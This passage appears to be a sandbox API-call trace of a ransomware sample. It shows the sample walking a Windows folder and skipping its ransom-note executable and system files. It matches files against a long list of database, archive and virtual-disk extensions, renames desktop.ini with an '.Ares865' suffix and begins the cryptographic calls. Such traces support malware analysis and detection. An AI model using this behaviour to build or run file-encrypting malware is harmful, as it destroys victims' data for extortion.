TV\\Sample Media\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x49674100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49674100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0a8 [0042.008] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.008] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.008] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.008] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x49674100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49674100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.008] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.008] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.008] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.008] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.009] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0042.009] lstrlenW (lpString="desktop.ini") returned 11 [0042.009] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\*") returned 42 [0042.009] lstrcpyW (in: lpString1=0x2cce452, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.009] lstrlenW (lpString="desktop.ini") returned 11 [0042.009] lstrlenW (lpString="Ares865") returned 7 [0042.009] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.009] lstrlenW (lpString=".dll") returned 4 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.009] lstrlenW (lpString=".lnk") returned 4 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.009] lstrlenW (lpString=".ini") returned 4 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.009] lstrlenW (lpString=".sys") returned 4 [0042.009] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.009] lstrlenW (lpString="desktop.ini") returned 11 [0042.009] lstrlenW (lpString="bak") returned 3 [0042.009] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0042.009] lstrlenW (lpString="ba_") returned 3 [0042.009] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0042.009] lstrlenW (lpString="dbb") returned 3 [0042.009] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0042.010] lstrlenW (lpString="vmdk") returned 4 [0042.010] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0042.010] lstrlenW (lpString="rar") returned 3 [0042.010] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0042.010] lstrlenW (lpString="zip") returned 3 [0042.010] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0042.010] lstrlenW (lpString="tgz") returned 3 [0042.010] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0042.010] lstrlenW (lpString="vbox") returned 4 [0042.010] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0042.010] lstrlenW (lpString="vdi") returned 3 [0042.010] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0042.010] lstrlenW (lpString="vhd") returned 3 [0042.010] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0042.010] lstrlenW (lpString="vhdx") returned 4 [0042.010] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0042.010] lstrlenW (lpString="avhd") returned 4 [0042.010] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0042.010] lstrlenW (lpString="db") returned 2 [0042.010] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0042.010] lstrlenW (lpString="db2") returned 3 [0042.010] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0042.010] lstrlenW (lpString="db3") returned 3 [0042.010] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0042.010] lstrlenW (lpString="dbf") returned 3 [0042.010] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0042.010] lstrlenW (lpString="mdf") returned 3 [0042.010] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0042.010] lstrlenW (lpString="mdb") returned 3 [0042.010] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0042.010] lstrlenW (lpString="sql") returned 3 [0042.010] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0042.010] lstrlenW (lpString="sqlite") returned 6 [0042.010] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0042.011] lstrlenW (lpString="sqlite3") returned 7 [0042.011] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0042.011] lstrlenW (lpString="sqlitedb") returned 8 [0042.011] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0042.011] lstrlenW (lpString="xml") returned 3 [0042.011] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0042.011] lstrlenW (lpString="$er") returned 3 [0042.011] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0042.011] lstrlenW (lpString="4dd") returned 3 [0042.011] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0042.011] lstrlenW (lpString="4dl") returned 3 [0042.011] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0042.011] lstrlenW (lpString="^^^") returned 3 [0042.011] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0042.011] lstrlenW (lpString="abs") returned 3 [0042.011] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0042.011] lstrlenW (lpString="abx") returned 3 [0042.011] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0042.011] lstrlenW (lpString="accdb") returned 5 [0042.011] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0042.011] lstrlenW (lpString="accdc") returned 5 [0042.011] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0042.011] lstrlenW (lpString="accde") returned 5 [0042.011] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0042.011] lstrlenW (lpString="accdr") returned 5 [0042.011] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0042.011] lstrlenW (lpString="accdt") returned 5 [0042.011] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0042.011] lstrlenW (lpString="accdw") returned 5 [0042.011] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0042.011] lstrlenW (lpString="accft") returned 5 [0042.011] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0042.011] lstrlenW (lpString="adb") returned 3 [0042.011] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0042.011] lstrlenW (lpString="adb") returned 3 [0042.011] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0042.012] lstrlenW (lpString="ade") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0042.012] lstrlenW (lpString="adf") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0042.012] lstrlenW (lpString="adn") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0042.012] lstrlenW (lpString="adp") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0042.012] lstrlenW (lpString="alf") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0042.012] lstrlenW (lpString="ask") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0042.012] lstrlenW (lpString="btr") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0042.012] lstrlenW (lpString="cat") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0042.012] lstrlenW (lpString="cdb") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0042.012] lstrlenW (lpString="ckp") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0042.012] lstrlenW (lpString="cma") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0042.012] lstrlenW (lpString="cpd") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0042.012] lstrlenW (lpString="dacpac") returned 6 [0042.012] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0042.012] lstrlenW (lpString="dad") returned 3 [0042.012] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0042.012] lstrlenW (lpString="dadiagrams") returned 10 [0042.012] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0042.012] lstrlenW (lpString="daschema") returned 8 [0042.012] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0042.012] lstrlenW (lpString="db-journal") returned 10 [0042.012] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0042.012] lstrlenW (lpString="db-shm") returned 6 [0042.013] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0042.013] lstrlenW (lpString="db-wal") returned 6 [0042.013] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0042.013] lstrlenW (lpString="dbc") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0042.013] lstrlenW (lpString="dbs") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0042.013] lstrlenW (lpString="dbt") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0042.013] lstrlenW (lpString="dbv") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0042.013] lstrlenW (lpString="dbx") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0042.013] lstrlenW (lpString="dcb") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0042.013] lstrlenW (lpString="dct") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0042.013] lstrlenW (lpString="dcx") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0042.013] lstrlenW (lpString="ddl") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0042.013] lstrlenW (lpString="dlis") returned 4 [0042.013] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0042.013] lstrlenW (lpString="dp1") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0042.013] lstrlenW (lpString="dqy") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0042.013] lstrlenW (lpString="dsk") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0042.013] lstrlenW (lpString="dsn") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0042.013] lstrlenW (lpString="dtsx") returned 4 [0042.013] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0042.013] lstrlenW (lpString="dxl") returned 3 [0042.013] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0042.013] lstrlenW (lpString="eco") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0042.014] lstrlenW (lpString="ecx") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0042.014] lstrlenW (lpString="edb") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0042.014] lstrlenW (lpString="epim") returned 4 [0042.014] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0042.014] lstrlenW (lpString="fcd") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0042.014] lstrlenW (lpString="fdb") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0042.014] lstrlenW (lpString="fic") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0042.014] lstrlenW (lpString="flexolibrary") returned 12 [0042.014] lstrlenW (lpString="fm5") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0042.014] lstrlenW (lpString="fmp") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0042.014] lstrlenW (lpString="fmp12") returned 5 [0042.014] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0042.014] lstrlenW (lpString="fmpsl") returned 5 [0042.014] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0042.014] lstrlenW (lpString="fol") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0042.014] lstrlenW (lpString="fp3") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0042.014] lstrlenW (lpString="fp4") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0042.014] lstrlenW (lpString="fp5") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0042.014] lstrlenW (lpString="fp7") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0042.014] lstrlenW (lpString="fpt") returned 3 [0042.014] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0042.014] lstrlenW (lpString="frm") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0042.015] lstrlenW (lpString="gdb") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0042.015] lstrlenW (lpString="gdb") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0042.015] lstrlenW (lpString="grdb") returned 4 [0042.015] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0042.015] lstrlenW (lpString="gwi") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0042.015] lstrlenW (lpString="hdb") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0042.015] lstrlenW (lpString="his") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0042.015] lstrlenW (lpString="ib") returned 2 [0042.015] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0042.015] lstrlenW (lpString="idb") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0042.015] lstrlenW (lpString="ihx") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0042.015] lstrlenW (lpString="itdb") returned 4 [0042.015] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0042.015] lstrlenW (lpString="itw") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0042.015] lstrlenW (lpString="jet") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0042.015] lstrlenW (lpString="jtx") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0042.015] lstrlenW (lpString="kdb") returned 3 [0042.015] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0042.015] lstrlenW (lpString="kexi") returned 4 [0042.015] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0042.015] lstrlenW (lpString="kexic") returned 5 [0042.015] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0042.015] lstrlenW (lpString="kexis") returned 5 [0042.015] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0042.016] lstrlenW (lpString="lgc") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0042.016] lstrlenW (lpString="lwx") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0042.016] lstrlenW (lpString="maf") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0042.016] lstrlenW (lpString="maq") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0042.016] lstrlenW (lpString="mar") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0042.016] lstrlenW (lpString="marshal") returned 7 [0042.016] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0042.016] lstrlenW (lpString="mas") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0042.016] lstrlenW (lpString="mav") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0042.016] lstrlenW (lpString="maw") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0042.016] lstrlenW (lpString="mdbhtml") returned 7 [0042.016] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0042.016] lstrlenW (lpString="mdn") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0042.016] lstrlenW (lpString="mdt") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0042.016] lstrlenW (lpString="mfd") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0042.016] lstrlenW (lpString="mpd") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0042.016] lstrlenW (lpString="mrg") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0042.016] lstrlenW (lpString="mud") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0042.016] lstrlenW (lpString="mwb") returned 3 [0042.016] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0042.017] lstrlenW (lpString="myd") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0042.017] lstrlenW (lpString="ndf") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0042.017] lstrlenW (lpString="nnt") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0042.017] lstrlenW (lpString="nrmlib") returned 6 [0042.017] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0042.017] lstrlenW (lpString="ns2") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0042.017] lstrlenW (lpString="ns3") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0042.017] lstrlenW (lpString="ns4") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0042.017] lstrlenW (lpString="nsf") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0042.017] lstrlenW (lpString="nv") returned 2 [0042.017] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0042.017] lstrlenW (lpString="nv2") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0042.017] lstrlenW (lpString="nwdb") returned 4 [0042.017] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0042.017] lstrlenW (lpString="nyf") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0042.017] lstrlenW (lpString="odb") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0042.017] lstrlenW (lpString="odb") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0042.017] lstrlenW (lpString="oqy") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0042.017] lstrlenW (lpString="ora") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0042.017] lstrlenW (lpString="orx") returned 3 [0042.017] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0042.017] lstrlenW (lpString="owc") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0042.018] lstrlenW (lpString="p96") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0042.018] lstrlenW (lpString="p97") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0042.018] lstrlenW (lpString="pan") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0042.018] lstrlenW (lpString="pdb") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0042.018] lstrlenW (lpString="pdm") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0042.018] lstrlenW (lpString="pnz") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0042.018] lstrlenW (lpString="qry") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0042.018] lstrlenW (lpString="qvd") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0042.018] lstrlenW (lpString="rbf") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0042.018] lstrlenW (lpString="rctd") returned 4 [0042.018] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0042.018] lstrlenW (lpString="rod") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0042.018] lstrlenW (lpString="rodx") returned 4 [0042.018] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0042.018] lstrlenW (lpString="rpd") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0042.018] lstrlenW (lpString="rsd") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0042.018] lstrlenW (lpString="sas7bdat") returned 8 [0042.018] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0042.018] lstrlenW (lpString="sbf") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0042.018] lstrlenW (lpString="scx") returned 3 [0042.018] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0042.019] lstrlenW (lpString="sdb") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0042.019] lstrlenW (lpString="sdc") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0042.019] lstrlenW (lpString="sdf") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0042.019] lstrlenW (lpString="sis") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0042.019] lstrlenW (lpString="spq") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0042.019] lstrlenW (lpString="te") returned 2 [0042.019] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0042.019] lstrlenW (lpString="teacher") returned 7 [0042.019] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0042.019] lstrlenW (lpString="tmd") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0042.019] lstrlenW (lpString="tps") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0042.019] lstrlenW (lpString="trc") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0042.019] lstrlenW (lpString="trc") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0042.019] lstrlenW (lpString="trm") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0042.019] lstrlenW (lpString="udb") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0042.019] lstrlenW (lpString="udl") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0042.019] lstrlenW (lpString="usr") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0042.019] lstrlenW (lpString="v12") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0042.019] lstrlenW (lpString="vis") returned 3 [0042.019] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0042.019] lstrlenW (lpString="vpd") returned 3 [0042.020] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0042.020] lstrlenW (lpString="vvv") returned 3 [0042.020] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0042.020] lstrlenW (lpString="wdb") returned 3 [0042.020] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0042.020] lstrlenW (lpString="wmdb") returned 4 [0042.020] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0042.020] lstrlenW (lpString="wrk") returned 3 [0042.020] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0042.020] lstrlenW (lpString="xdb") returned 3 [0042.020] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0042.020] lstrlenW (lpString="xld") returned 3 [0042.020] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0042.020] lstrlenW (lpString="xmlff") returned 5 [0042.020] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0042.020] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.Ares865") returned 60 [0042.020] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0042.021] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x160 [0042.021] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=171) returned 1 [0042.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0042.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0042.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0042.021] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0042.022] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0042.022] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0042.022] CreateFileMappingW (hFile=0x160, lpFileMappingAttributes=0x0, flProtect=0x4, 